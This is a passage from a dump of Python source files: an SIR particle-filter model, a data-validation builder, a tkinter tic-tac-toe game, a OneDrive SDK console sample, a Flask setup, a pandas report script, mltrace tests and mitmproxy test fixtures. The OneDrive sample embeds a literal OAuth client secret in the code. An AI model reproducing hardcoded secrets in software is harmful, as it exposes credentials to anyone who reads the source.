self.current_Ss[j]\n i = self.current_Is[j]\n s += self._delta_s(self.current_Ss[j], self.current_Is[j], \n self.alphas[j])\n i += self._delta_i(self.current_Ss[j], self.current_Is[j], \n self.alphas[j], self.betas[j])\n\n s = self.check_bounds(s)\n i = self.check_bounds(i)\n\n self.current_Is[j] = i\n self.current_Ss[j] = s\n\n self.Is.append(self.current_Is.tolist())\n self.Ss.append(self.current_Ss.tolist())\n\n def _init_filter(self):\n num_states = 4\n num_obs = 1\n \n self.filter = ParticleFilter(self.num_enbs)\n\n def predict_with_filter(self):\n F = self.filter\n\n while self.epoch < self.epochs - 1:\n X = as_matrix([self.current_Ss, self.current_Is, \n self.alphas, self.betas])\n \n F.fit(X)\n y = self.CDC_obs[self.epoch]\n F.step(y, predict_P=False)\n self.weights.append(F.weights)\n\n x_post = F.x_post\n for j in range(self.num_enbs):\n self.current_Ss[j] = self.check_bounds(x_post[0, j])\n self.current_Is[j] = self.check_bounds(x_post[1, j])\n self.alphas[j] = self.check_bounds(x_post[2, j], inf)\n self.betas[j] = self.check_bounds(x_post[3, j], inf)\n\n self.update_states()\n self.epoch += 1\n\n self.get_score()\n\n def _delta_s(self, s, i, alpha):\n return - alpha * s * i\n\n def _delta_i(self, s, i, alpha, beta):\n return alpha * s * i - beta * i\n\n def check_par_bounds(self, par):\n if par < 0: par = 0\n return par\n\n def get_score(self):\n I_mat = as_array(self.Is)\n for i, w in enumerate(self.weights):\n I_mat[i] *= w \n\n self.IS = sum(I_mat, axis=1)\n\n time_gap = self.epochs / 52\n idx = [x for x in range(self.epochs) if not x % time_gap]\n\n self.score = RSS(self.CDC_obs, self.IS[idx])\n self.scores = {}\n self.scores['SSE'] = self.score\n self.scores['RMSE'] = RMSE(self.CDC_obs, self.IS[idx])\n self.scores['MSPE'] = MSPE(self.CDC_obs, self.IS[idx])\n self.scores['CORR'] = corrcoef(self.CDC_obs, self.IS[idx])[0, 1]\n return self.score\n"} {"ext": "py", "sha": "1a2f6941e27fb89420a1d6e6a0b3c69ea5a9c28b", "content": "from typing import Any, Dict, Optional, Set\n\nimport great_expectations.exceptions as ge_exceptions\nfrom great_expectations.core.expectation_configuration import ExpectationConfiguration\nfrom great_expectations.rule_based_profiler.expectation_configuration_builder import (\n ExpectationConfigurationBuilder,\n)\nfrom great_expectations.rule_based_profiler.types import Domain, ParameterContainer\nfrom great_expectations.rule_based_profiler.util import (\n get_parameter_value_and_validate_return_type,\n)\n\n\nclass 
DefaultExpectationConfigurationBuilder(ExpectationConfigurationBuilder):\n \"\"\"\n Class which creates ExpectationConfiguration out of a given Expectation type and\n parameter_name-to-parameter_fully_qualified_parameter_name map (name-value pairs supplied in the kwargs dictionary).\n \"\"\"\n\n exclude_field_names: Set[str] = {\n \"kwargs\",\n }\n\n def __init__(\n self,\n expectation_type: str,\n meta: Optional[Dict[str, Any]] = None,\n **kwargs,\n ):\n super().__init__(expectation_type=expectation_type, **kwargs)\n\n self._kwargs = kwargs\n\n if meta is None:\n meta = {}\n\n if not isinstance(meta, dict):\n raise ge_exceptions.ProfilerExecutionError(\n message=f\"\"\"Argument \"{meta}\" in \"{self.__class__.__name__}\" must be of type \"dictionary\" \\\n(value of type \"{str(type())}\" was encountered).\n\"\"\"\n )\n\n self._meta = meta\n\n @property\n def expectation_type(self) -> str:\n return self._expectation_type\n\n @property\n def kwargs(self) -> dict:\n return self._kwargs\n\n @property\n def meta(self) -> dict:\n return self._meta\n\n def _build_expectation_configuration(\n self,\n domain: Domain,\n variables: Optional[ParameterContainer] = None,\n parameters: Optional[Dict[str, ParameterContainer]] = None,\n ) -> ExpectationConfiguration:\n parameter_name: str\n fully_qualified_parameter_name: str\n expectation_kwargs: Dict[str, Any] = {\n parameter_name: get_parameter_value_and_validate_return_type(\n domain=domain,\n parameter_reference=fully_qualified_parameter_name,\n expected_return_type=None,\n variables=variables,\n parameters=parameters,\n )\n for parameter_name, fully_qualified_parameter_name in self.kwargs.items()\n }\n meta: Dict[str, Any] = get_parameter_value_and_validate_return_type(\n domain=domain,\n parameter_reference=self.meta,\n expected_return_type=dict,\n variables=variables,\n parameters=parameters,\n )\n return ExpectationConfiguration(\n expectation_type=self.expectation_type,\n kwargs=expectation_kwargs,\n meta=meta,\n )\n"} {"ext": "py", "sha": "1a2f698957882dcea8b690d9abd96592d8e8f8b5", "content": "from tkinter import *\r\nfrom tkinter import messagebox\r\nroot=Tk()\r\nroot.title(\"TIC TAC TOE!\")\r\npress=True\r\nflag=0\r\ns1=\"0\"\r\ns2=\"0\"\r\n#main game logic\r\ndef check(button):\r\n global press\r\n global flag\r\n global s1\r\n global s2\r\n \r\n #alternate player turn's logic\r\n if button[\"text\"]==\"\" and press==True:\r\n button[\"text\"]=\"X\"\r\n press=False\r\n flag+=1\r\n elif button[\"text\"]==\"\" and press==False:\r\n button[\"text\"]=\"O\"\r\n press=True\r\n flag+=1\r\n \r\n # X winning logic\r\n if (button1[\"text\"]==\"X\" and button2[\"text\"]==\"X\" and button3[\"text\"]==\"X\" or\r\n button1[\"text\"]==\"X\" and button4[\"text\"]==\"X\" and button7[\"text\"]==\"X\" or\r\n button2[\"text\"]==\"X\" and button5[\"text\"]==\"X\" and button8[\"text\"]==\"X\" or\r\n button3[\"text\"]==\"X\" and button6[\"text\"]==\"X\" and button9[\"text\"]==\"X\" or\r\n button7[\"text\"]==\"X\" and button8[\"text\"]==\"X\" and button9[\"text\"]==\"X\" or\r\n button4[\"text\"]==\"X\" and button5[\"text\"]==\"X\" and button6[\"text\"]==\"X\" or\r\n button1[\"text\"]==\"X\" and button5[\"text\"]==\"X\" and button9[\"text\"]==\"X\" or\r\n button7[\"text\"]==\"X\" and button5[\"text\"]==\"X\" and button3[\"text\"]==\"X\"):\r\n messagebox.showinfo(\"GAME OVER\",\"X Is Winner!\")\r\n flag=0\r\n press=True\r\n s1=int(s1)\r\n s1=(s1+1)\r\n s1=str(s1)\r\n var0.set(s1)\r\n reset()\r\n \r\n # O winning logic\r\n elif (button1[\"text\"]==\"O\" and 
button2[\"text\"]==\"O\" and button3[\"text\"]==\"O\" or\r\n button1[\"text\"]==\"O\" and button4[\"text\"]==\"O\" and button7[\"text\"]==\"O\" or\r\n button2[\"text\"]==\"O\" and button5[\"text\"]==\"O\" and button8[\"text\"]==\"O\" or\r\n button3[\"text\"]==\"O\" and button6[\"text\"]==\"O\" and button9[\"text\"]==\"O\" or\r\n button7[\"text\"]==\"O\" and button8[\"text\"]==\"O\" and button9[\"text\"]==\"O\" or\r\n button4[\"text\"]==\"O\" and button5[\"text\"]==\"O\" and button6[\"text\"]==\"O\" or\r\n button1[\"text\"]==\"O\" and button5[\"text\"]==\"O\" and button9[\"text\"]==\"O\" or\r\n button7[\"text\"]==\"O\" and button5[\"text\"]==\"O\" and button3[\"text\"]==\"O\"):\r\n messagebox.showinfo(\"GAME OVER\",\"O Is Winner!\")\r\n flag=0\r\n press=True\r\n s2=int(s2)\r\n s2=(s2+1)\r\n s2=str(s2)\r\n var1.set(s2)\r\n reset()\r\n \r\n\r\n\r\n elif flag>=9:\r\n messagebox.showinfo(\"GAME OVER\",\"Match Is Draw!\")\r\n flag=0\r\n press=True\r\n reset()\r\n \r\ndef resetscore():\r\n global s1\r\n global s2\r\n s1=\"0\"\r\n s2=\"0\"\r\n var0.set(s1)\r\n var1.set(s2)\r\n \r\ndef reset():\r\n button1[\"text\"]=\"\"\r\n button2[\"text\"]=\"\"\r\n button3[\"text\"]=\"\"\r\n button4[\"text\"]=\"\"\r\n button5[\"text\"]=\"\"\r\n button6[\"text\"]=\"\"\r\n button7[\"text\"]=\"\"\r\n button8[\"text\"]=\"\"\r\n button9[\"text\"]=\"\"\r\n\r\n#score logic\r\nscore=Label(root,text=\"---<:{ $core }:>---\",font=(\"Verdana\",\"15\",\"normal\"))\r\nscore.pack(anchor=N)\r\n\r\nvar0=StringVar()\r\nscoren=Frame(root)\r\nscoren.pack(anchor=W)\r\nscorep1=Label(scoren,text=\"player X:\",font=(\"Verdana\",\"11\",\"bold\"))\r\nscorep1.grid(row=0,column=0)\r\nscorep1c=Label(scoren,textvariable=var0,font=(\"Segoe UI\",\"14\",\"bold\"))\r\nscorep1c.grid(row=0,column=1)\r\nvar0.set(s1)\r\n\r\nvar1=StringVar()\r\nscorep2=Label(scoren,text=\"\\tplayer O:\",font=(\"Verdana\",\"11\",\"bold\"))\r\nscorep2.grid(row=0,column=2)\r\nscorep2c=Label(scoren,textvariable=var1,font=(\"Segoe UI\",\"14\",\"bold\"))\r\nscorep2c.grid(row=0,column=3)\r\nvar1.set(s2)\r\n\r\n#button logic\r\nbuttonframe=Frame(root)\r\nbuttonframe.pack(padx=5,pady=5)\r\n\r\nbutton1=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button1))\r\nbutton1.grid(row=0,column=0)\r\nbutton2=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button2))\r\nbutton2.grid(row=0,column=1)\r\nbutton3=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button3))\r\nbutton3.grid(row=0,column=2)\r\nbutton4=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button4))\r\nbutton4.grid(row=1,column=0)\r\nbutton5=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button5))\r\nbutton5.grid(row=1,column=1)\r\nbutton6=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button6))\r\nbutton6.grid(row=1,column=2)\r\nbutton7=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button7))\r\nbutton7.grid(row=2,column=0)\r\nbutton8=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe 
UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button8))\r\nbutton8.grid(row=2,column=1)\r\nbutton9=Button(buttonframe,text=\"\",bd=2,relief = GROOVE ,font=(\"Segoe UI\",\"10\",\"bold\"),height=5,width=10,command=lambda:check(button9))\r\nbutton9.grid(row=2,column=2)\r\n\r\nbuttonresetscore=Button(root,text=\"---| Reset $core |---\",font=(\"Verdana\",\"13\",\"normal\"),command=lambda:resetscore())\r\nbuttonresetscore.pack(fill=X,side=BOTTOM)\r\n\r\nbuttonresetboard=Button(root,text=\"---| Reset Board # |---\",font=(\"Verdana\",\"13\",\"normal\"),command=lambda:reset())\r\nbuttonresetboard.pack(fill=X,side=BOTTOM)\r\n\r\nroot.mainloop()\r\n"} {"ext": "py", "sha": "1a2f6b26d18ed65f77729b5229ceba6d8429758d", "content": "from __future__ import unicode_literals\n\nimport onedrivesdk\nfrom onedrivesdk.helpers import GetAuthCodeServer\nfrom PIL import Image\nimport os\n\ninput = getattr(__builtins__, 'raw_input', input)\n\ndef main():\n redirect_uri = \"http://localhost:8080/\"\n client_secret = \"BqaTYqI0XI7wDKcnJ5i3MvLwGcVsaMVM\"\n\n client = onedrivesdk.get_default_client(client_id='00000000481695BB',\n scopes=['wl.signin',\n 'wl.offline_access',\n 'onedrive.readwrite'])\n auth_url = client.auth_provider.get_auth_url(redirect_uri)\n\n # Block thread until we have the code\n code = GetAuthCodeServer.get_auth_code(auth_url, redirect_uri)\n # Finally, authenticate!\n client.auth_provider.authenticate(code, redirect_uri, client_secret)\n item_id = \"root\"\n copy_item_ids = None\n action = 0\n\n while True:\n items = navigate(client, item_id)\n print(\"0: UP\")\n count = 0\n for count, item in enumerate(items):\n print(\"{} {}\".format(count+1, item.name if item.folder is None else \"/\"+item.name))\n\n selected = input(\"Select item, enter 'C' to copy all, enter 'L' to list changes in current folder: \")\n\n if selected == \"C\":\n copy_item_ids = []\n for item in items:\n copy_item_ids.append(item.id)\n\n elif selected == \"L\":\n token = input(\"Enter your token, or nothing if you do not have one: \")\n list_changes(client, item_id, token)\n\n else:\n selected = int(selected)\n\n if selected == 0:\n item_id = get_parent_id(client, item_id)\n else:\n action = int(input(\"Select action: 1:Navigate 2:Rename 3:View Thumbnail 4: Get Sharing Link 5: List Changes 6:Download 7:Upload 8:Delete 9:Copy{}... 
\".format(\" 10: Paste\" if copy_item_ids else \"\")))\n if items[selected-1].folder is None or (action != 6 and action != 1):\n if action == 1:\n print(\"Can't navigate a file\")\n elif action == 2:\n rename(client, items[selected-1].id)\n elif action == 3:\n view_thumbnail(client, items[selected-1].id)\n elif action == 4:\n get_sharing_link(client, items[selected-1].id)\n elif action == 5:\n token = input(\"Enter your token, or nothing if you do not have one: \")\n list_changes(client, items[selected-1].id, token)\n elif action == 6:\n download(client, items[selected-1].id)\n elif action == 7:\n if item.folder is None:\n print(\"You cannot upload to a file\")\n else:\n upload(client, items[selected-1].id)\n elif action == 8:\n delete(client, items[selected-1].id)\n elif action == 9:\n copy_item_ids = [items[selected-1].id]\n elif action == 10 and copy_item_ids:\n if items[selected-1].folder:\n paste(client, items[selected-1].id, copy_item_ids)\n else:\n print(\"Can't copy to a file\")\n else:\n item_id = items[selected-1].id\n\n\ndef navigate(client, item_id):\n items = client.item(id=item_id).children.get()\n return items\n\n\ndef rename(client, item_id):\n new_name = input(\"Enter new name: \")\n renamed_item = onedrivesdk.Item()\n renamed_item.name = new_name\n renamed_item.id = item_id\n client.item(id=item_id).update(renamed_item)\n\n\ndef view_thumbnail(client, item_id):\n if len(client.item(id=item_id).thumbnails.get()) == 0:\n print(\"File does not have any thumbnails!\\n\")\n else:\n action = int(input(\"Size? 1:Small 2:Medium 3:Large... \"))\n try:\n os.remove(\"./tmp_thumb.jpg\")\n except:\n pass\n if action == 1:\n client.item(id=item_id).thumbnails[0].small.download(\"./tmp_thumb.jpg\")\n elif action == 2:\n client.item(id=item_id).thumbnails[0].medium.download(\"./tmp_thumb.jpg\")\n elif action == 3:\n client.item(id=item_id).thumbnails[0].large.download(\"./tmp_thumb.jpg\")\n image = Image.open(\"./tmp_thumb.jpg\")\n image.show()\n\n\ndef get_sharing_link(client, item_id):\n action = int(input(\"Type? 1:View 2:Edit... \"))\n permission = client.item(id=item_id).create_link(\"view\" if action == 1 else \"edit\").post()\n print(\"\\n{}\\n\".format(permission.link.web_url))\n\n\ndef download(client, item_id):\n directory = input(\"Enter download directory (can be relative): \")\n client.item(id=item_id).download(directory)\n\n\ndef upload(client, item_id):\n directory = input(\"Enter upload file directory (can be relative): \")\n name = input(\"Enter file name with extension: \")\n client.item(id=item_id).children[name].upload(directory)\n\n\ndef delete(client, item_id):\n confirm = input(\"Confirm delete? Y/N: \")\n if confirm == \"Y\":\n client.item(id=item_id).delete()\n\n\ndef paste(client, item_id, copy_item_ids):\n ref = onedrivesdk.ItemReference()\n ref.id = item_id\n for id in copy_item_ids:\n client.item(id=id).copy(parent_reference=ref).post()\n\n\ndef list_changes(client, item_id, token):\n collection_page = client.item(id=item_id).delta(token).get()\n for item in collection_page:\n print(item.name)\n\n print(\"TOKEN: {}\".format(collection_page.token))\n\n\ndef get_parent_id(client, item_id):\n id = client.item(id=item_id).get().parent_reference.id\n return id\n\nif __name__ == \"__main__\":\n main()"} {"ext": "py", "sha": "1a2f6c799c17fb14d2f2a92b26e184b7470db5fe", "content": "# (C) Datadog, Inc. 
2018\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\nimport sys\n\nfrom .tooling.cli import checksdev\n\n\nsys.exit(checksdev())\n"} {"ext": "py", "sha": "1a2f6ca2696ebe288e70eded2becccc9e7440570", "content": "from flask import Flask\nfrom os import getenv\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = getenv('DATABASE_URI')\napp.config['SQALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\nfrom application import routes"} {"ext": "py", "sha": "1a2f6d44c2201ac61c6ceeed9258fa77cd45998b", "content": "#!/usr/local/epd/bin/python\n#-----------------------------------------------------------\n# \n#-----------------------------------------------------------\ndef SetPyWignerCUDA_Path():\n\timport sys\n\tsys.path.append(\"/home/rcabrera/Documents/source/python/PyWignerCUDA\")\n"} {"ext": "py", "sha": "1a2f6da490bdb85625c68ffbd19e1ca73b40428e", "content": "def report_generator(file_path1, file_path2):\n import numpy as np\n import pandas as pd\n from IPython.display import display\n \n # read excel files\n df1 = pd.read_excel(file_path1, sheet_name = 1, index_col= 0, header = 1, usecols = range(41), skipfooter = 17)\n df2 = pd.read_excel(file_path2, sheet_name = 6, index_col= 0, header = 0, usecols = range(46), skipfooter = 0)\n \n cols = [0, 3, 5, 8, 10, 13, 15, 18]\n df3 = pd.read_excel(file_path2, sheet_name = 1, header = 0, usecols = cols, skipfooter = 3)\n df4 = pd.read_excel(file_path2, sheet_name = 2, header = 0, usecols = cols, skipfooter = 6)\n df5 = pd.concat([df3.tail(2), df4.tail(2)], axis = 1)\n \n # check the data \n display(df1.tail(2))\n display(df2.tail(2))\n display(df5.tail(2))\n \n report = pd.read_excel('一手住宅简报格式.xlsx', sheet_name = 1, header = 0, index_col = 0,\n skipfooter = 33, usecols = range(0, 45))\n display(report.tail(2))\n \n # generate supply and sales data of new houses in 40 cities\n cities = list(report.columns[4:])\n dict = {}\n for i in cities:\n dict[i] = [df1[i][-1], df2[i][-1]]\n\n result = pd.DataFrame(dict, index = ['40城住宅成交', '40城住宅供应'])\n \n \n # generate new house prices in 8 major cities\n dict2 = {}\n k = 0\n j = 1\n while j <= 15:\n dict2[df5.columns[k]] = df5.iloc[-1, j]\n k = k + 2\n j = j + 2\n\n result2 = pd.DataFrame(dict2, index = [df5.iloc[-1, 0]])\n \n # write the results into one excel file\n writer = pd.ExcelWriter('result_newhouse.xlsx')\n result.to_excel(writer, sheet_name = 'supply_and_sales')\n result2.to_excel(writer, sheet_name = 'prices')\n writer.save()\n \n return\n\nprint('运行 report_generator(40城,20城)')\n"} {"ext": "py", "sha": "1a2f6e8198d39d4856437106bb2118557054f170", "content": "import copy\nimport unittest\n\nfrom datetime import datetime\nfrom mltrace.db import Component, ComponentRun, IOPointer, Store\n\n\nclass TestDags(unittest.TestCase):\n def setUp(self):\n self.store = Store(\"test\")\n\n def testLinkedList(self):\n # Create chain of component runs\n expected_result = []\n num_runs = 10\n for i in range(1, num_runs + 1):\n self.store.create_component(f\"mock_component_{i}\", \"\", \"\")\n inp = self.store.get_io_pointer(f\"iop_{i}\")\n out = self.store.get_io_pointer(f\"iop_{i + 1}\")\n cr = self.store.initialize_empty_component_run(\n f\"mock_component_{i}\"\n )\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(inp)\n cr.add_output(out)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n expected_result.append((num_runs - i, i))\n\n # Reverse the expected result\n 
expected_result.reverse()\n\n # Trace the final output\n trace = self.store.trace(\"iop_11\")\n level_id = [(level, cr.id) for level, cr in trace]\n self.assertEqual(expected_result, level_id)\n\n def testVersionedComputation(self):\n # Run the same computation many times\n self.store.create_component(\"mock_component\", \"\", \"\")\n num_runs = 10\n for i in range(1, num_runs + 1):\n inp = self.store.get_io_pointer(\"inp\")\n out = self.store.get_io_pointer(\"out\")\n cr = self.store.initialize_empty_component_run(\"mock_component\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(inp)\n cr.add_output(out)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Trace the out pointer. Only most recent run ID should show.\n trace = self.store.trace(\"out\")\n self.assertEqual(len(trace), 1)\n self.assertEqual(trace[0][0], 0)\n self.assertEqual(trace[0][1].id, num_runs)\n\n def testTree(self):\n # Create a tree of component runs, 5 levels deep\n num_levels = 2\n global cr_counter\n global iop_counter\n cr_counter = 1\n iop_counter = 1\n\n def create_tree(level, inp):\n if level == num_levels:\n return\n\n global cr_counter\n global iop_counter\n\n self.store.create_component(f\"mock_component_{cr_counter}\", \"\", \"\")\n cr = self.store.initialize_empty_component_run(\n f\"mock_component_{cr_counter}\"\n )\n cr_counter += 1\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n\n # Create output pointers\n out1 = self.store.get_io_pointer(f\"iop_{iop_counter}\")\n iop_counter += 1\n out2 = self.store.get_io_pointer(f\"iop_{iop_counter}\")\n iop_counter += 1\n\n # Add and commit component run\n cr.add_input(inp)\n cr.add_outputs([out1, out2])\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Create left and right trees\n create_tree(level + 1, out1)\n create_tree(level + 1, out2)\n\n # Create first input pointer and tree of computation\n inp = self.store.get_io_pointer(f\"iop_{iop_counter}\")\n iop_counter += 1\n create_tree(0, inp)\n\n # Grab last iop id and trace it\n last_iop_id = f\"iop_{iop_counter - 1}\"\n trace = self.store.trace(last_iop_id)\n level_id = [(level, cr.id) for level, cr in trace]\n self.assertEqual(level_id, [(0, 3), (1, 1)])\n\n def testCycle(self):\n # Create cycle. 
Since dependencies are versioned, we shouldn't run\n # into problems.\n # Create io pointers and components\n iop1 = self.store.get_io_pointer(\"iop1\")\n iop2 = self.store.get_io_pointer(\"iop2\")\n self.store.create_component(\"component_1\", \"\", \"\")\n self.store.create_component(\"component_2\", \"\", \"\")\n\n # Create component runs\n cr = self.store.initialize_empty_component_run(\"component_1\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(iop1)\n cr.add_output(iop2)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n cr = self.store.initialize_empty_component_run(\"component_2\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(iop2)\n cr.add_output(iop1)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Trace iop1\n trace_1 = [(level, cr.id) for level, cr in self.store.trace(\"iop1\")]\n trace_2 = [(level, cr.id) for level, cr in self.store.trace(\"iop2\")]\n self.assertEqual(trace_1, [(0, 2), (1, 1)])\n self.assertEqual(trace_2, [(0, 1)])\n\n def testStaleUpdate(self):\n # Create computation with stale update.\n iop1 = self.store.get_io_pointer(\"iop1\")\n iop2 = self.store.get_io_pointer(\"iop2\")\n iop3 = self.store.get_io_pointer(\"iop3\")\n iop4 = self.store.get_io_pointer(\"iop4\")\n self.store.create_component(\"component_1\", \"\", \"\")\n self.store.create_component(\"component_2\", \"\", \"\")\n\n # Create first component\n cr = self.store.initialize_empty_component_run(\"component_1\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(iop1)\n cr.add_output(iop2)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Create second component run\n cr = self.store.initialize_empty_component_run(\"component_1\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(iop1)\n cr.add_output(iop3)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Create third component run that depends on the first (stale update)\n cr = self.store.initialize_empty_component_run(\"component_2\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(iop2)\n cr.add_output(iop4)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Trace iop4\n trace = [\n (level, cr.id, cr.stale) for level, cr in self.store.trace(\"iop4\")\n ]\n res = [\n (\n 0,\n 3,\n [\n \"component_1 (ID 1) has 1 fresher run(s) that began \"\n + \"before this component run started.\"\n ],\n ),\n (1, 1, []),\n ]\n self.assertEqual(trace, res)\n\n def testStaleTime(self):\n # Create computation with stale update.\n iop1 = self.store.get_io_pointer(\"iop1\")\n iop2 = self.store.get_io_pointer(\"iop2\")\n iop3 = self.store.get_io_pointer(\"iop3\")\n self.store.create_component(\"component_1\", \"\", \"\")\n self.store.create_component(\"component_2\", \"\", \"\")\n now = datetime.utcnow()\n\n # Create first component\n cr = self.store.initialize_empty_component_run(\"component_1\")\n cr.set_start_timestamp(now.replace(month=now.month - 2))\n cr.set_end_timestamp()\n cr.add_input(iop1)\n cr.add_output(iop2)\n self.store.set_dependencies_from_inputs(cr)\n self.store.commit_component_run(cr)\n\n # Create second component run\n cr = self.store.initialize_empty_component_run(\"component_2\")\n cr.set_start_timestamp()\n cr.set_end_timestamp()\n cr.add_input(iop2)\n cr.add_output(iop3)\n self.store.set_dependencies_from_inputs(cr)\n 
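# --- Illustrative aside (not part of the original test file) ----------------
# The stale-update tests around here assert on the `stale` messages attached
# to each traced component run. A small sketch of how those annotations could
# be surfaced outside a test, assuming only what the tests already show:
# Store.trace() yields (level, component_run) pairs and each run carries a
# `stale` list of human-readable strings. The helper name is hypothetical.
def report_stale_runs(store, output_pointer_name):
    warnings = []
    for level, run in store.trace(output_pointer_name):
        for message in run.stale:
            warnings.append(f"level {level}, run {run.id}: {message}")
    return warnings
# ----------------------------------------------------------------------------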
self.store.commit_component_run(cr)\n\n # Trace\n trace = [\n (level, cr.id, cr.stale) for level, cr in self.store.trace(\"iop3\")\n ]\n res = [(0, 2, [\"component_1 (ID 1) was run 61 days ago.\"]), (1, 1, [])]\n self.assertEqual(trace, res)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"} {"ext": "py", "sha": "1a2f6edaf7508e8f226000be8dc8d908aec1adb9", "content": "import io\nimport uuid\n\nfrom mitmproxy.test import tutils\nfrom mitmproxy import tcp\nfrom mitmproxy import websocket\nfrom mitmproxy import controller\nfrom mitmproxy import http\nfrom mitmproxy import flow\nfrom mitmproxy.net import http as net_http\nfrom mitmproxy.proxy import context\n\nfrom wsproto.frame_protocol import Opcode\n\n\ndef ttcpflow(client_conn=True, server_conn=True, messages=True, err=None):\n if client_conn is True:\n client_conn = tclient_conn()\n if server_conn is True:\n server_conn = tserver_conn()\n if messages is True:\n messages = [\n tcp.TCPMessage(True, b\"hello\"),\n tcp.TCPMessage(False, b\"it's me\"),\n ]\n if err is True:\n err = terr()\n\n f = tcp.TCPFlow(client_conn, server_conn)\n f.messages = messages\n f.error = err\n f.reply = controller.DummyReply()\n return f\n\n\ndef twebsocketflow(client_conn=True, server_conn=True, messages=True, err=None, handshake_flow=True):\n\n if client_conn is True:\n client_conn = tclient_conn()\n if server_conn is True:\n server_conn = tserver_conn()\n if handshake_flow is True:\n req = http.HTTPRequest(\n \"example.com\",\n 80,\n b\"GET\",\n b\"http\",\n b\"example.com\",\n b\"/ws\",\n b\"HTTP/1.1\",\n headers=net_http.Headers(\n connection=\"upgrade\",\n upgrade=\"websocket\",\n sec_websocket_version=\"13\",\n sec_websocket_key=\"1234\",\n ),\n content=b'',\n trailers=None,\n timestamp_start=946681200,\n timestamp_end=946681201,\n\n )\n resp = http.HTTPResponse(\n b\"HTTP/1.1\",\n 101,\n reason=net_http.status_codes.RESPONSES.get(101),\n headers=net_http.Headers(\n connection='upgrade',\n upgrade='websocket',\n sec_websocket_accept=b'',\n ),\n content=b'',\n trailers=None,\n timestamp_start=946681202,\n timestamp_end=946681203,\n )\n handshake_flow = http.HTTPFlow(client_conn, server_conn)\n handshake_flow.request = req\n handshake_flow.response = resp\n\n f = websocket.WebSocketFlow(client_conn, server_conn, handshake_flow)\n f.metadata['websocket_handshake'] = handshake_flow.id\n handshake_flow.metadata['websocket_flow'] = f.id\n handshake_flow.metadata['websocket'] = True\n\n if messages is True:\n messages = [\n websocket.WebSocketMessage(Opcode.BINARY, True, b\"hello binary\"),\n websocket.WebSocketMessage(Opcode.TEXT, True, b\"hello text\"),\n websocket.WebSocketMessage(Opcode.TEXT, False, b\"it's me\"),\n ]\n if err is True:\n err = terr()\n\n f.messages = messages\n f.error = err\n f.reply = controller.DummyReply()\n return f\n\n\ndef tflow(client_conn=True, server_conn=True, req=True, resp=None, err=None):\n \"\"\"\n @type client_conn: bool | None | mitmproxy.proxy.connection.ClientConnection\n @type server_conn: bool | None | mitmproxy.proxy.connection.ServerConnection\n @type req: bool | None | mitmproxy.proxy.protocol.http.HTTPRequest\n @type resp: bool | None | mitmproxy.proxy.protocol.http.HTTPResponse\n @type err: bool | None | mitmproxy.proxy.protocol.primitives.Error\n @return: mitmproxy.proxy.protocol.http.HTTPFlow\n \"\"\"\n if client_conn is True:\n client_conn = tclient_conn()\n if server_conn is True:\n server_conn = tserver_conn()\n if req is True:\n req = tutils.treq()\n if resp is True:\n resp = tutils.tresp()\n if err is 
True:\n err = terr()\n\n f = http.HTTPFlow(client_conn, server_conn)\n f.request = req\n f.response = resp\n f.error = err\n f.reply = controller.DummyReply()\n return f\n\n\nclass DummyFlow(flow.Flow):\n \"\"\"A flow that is neither HTTP nor TCP.\"\"\"\n\n def __init__(self, client_conn, server_conn, live=None):\n super().__init__(\"dummy\", client_conn, server_conn, live)\n\n\ndef tdummyflow(client_conn=True, server_conn=True, err=None):\n if client_conn is True:\n client_conn = tclient_conn()\n if server_conn is True:\n server_conn = tserver_conn()\n if err is True:\n err = terr()\n\n f = DummyFlow(client_conn, server_conn)\n f.error = err\n f.reply = controller.DummyReply()\n return f\n\n\ndef tclient_conn() -> context.Client:\n c = context.Client.from_state(dict(\n id=str(uuid.uuid4()),\n address=(\"127.0.0.1\", 22),\n mitmcert=None,\n tls_established=True,\n timestamp_start=946681200,\n timestamp_tls_setup=946681201,\n timestamp_end=946681206,\n sni=\"address\",\n cipher_name=\"cipher\",\n alpn_proto_negotiated=b\"http/1.1\",\n tls_version=\"TLSv1.2\",\n 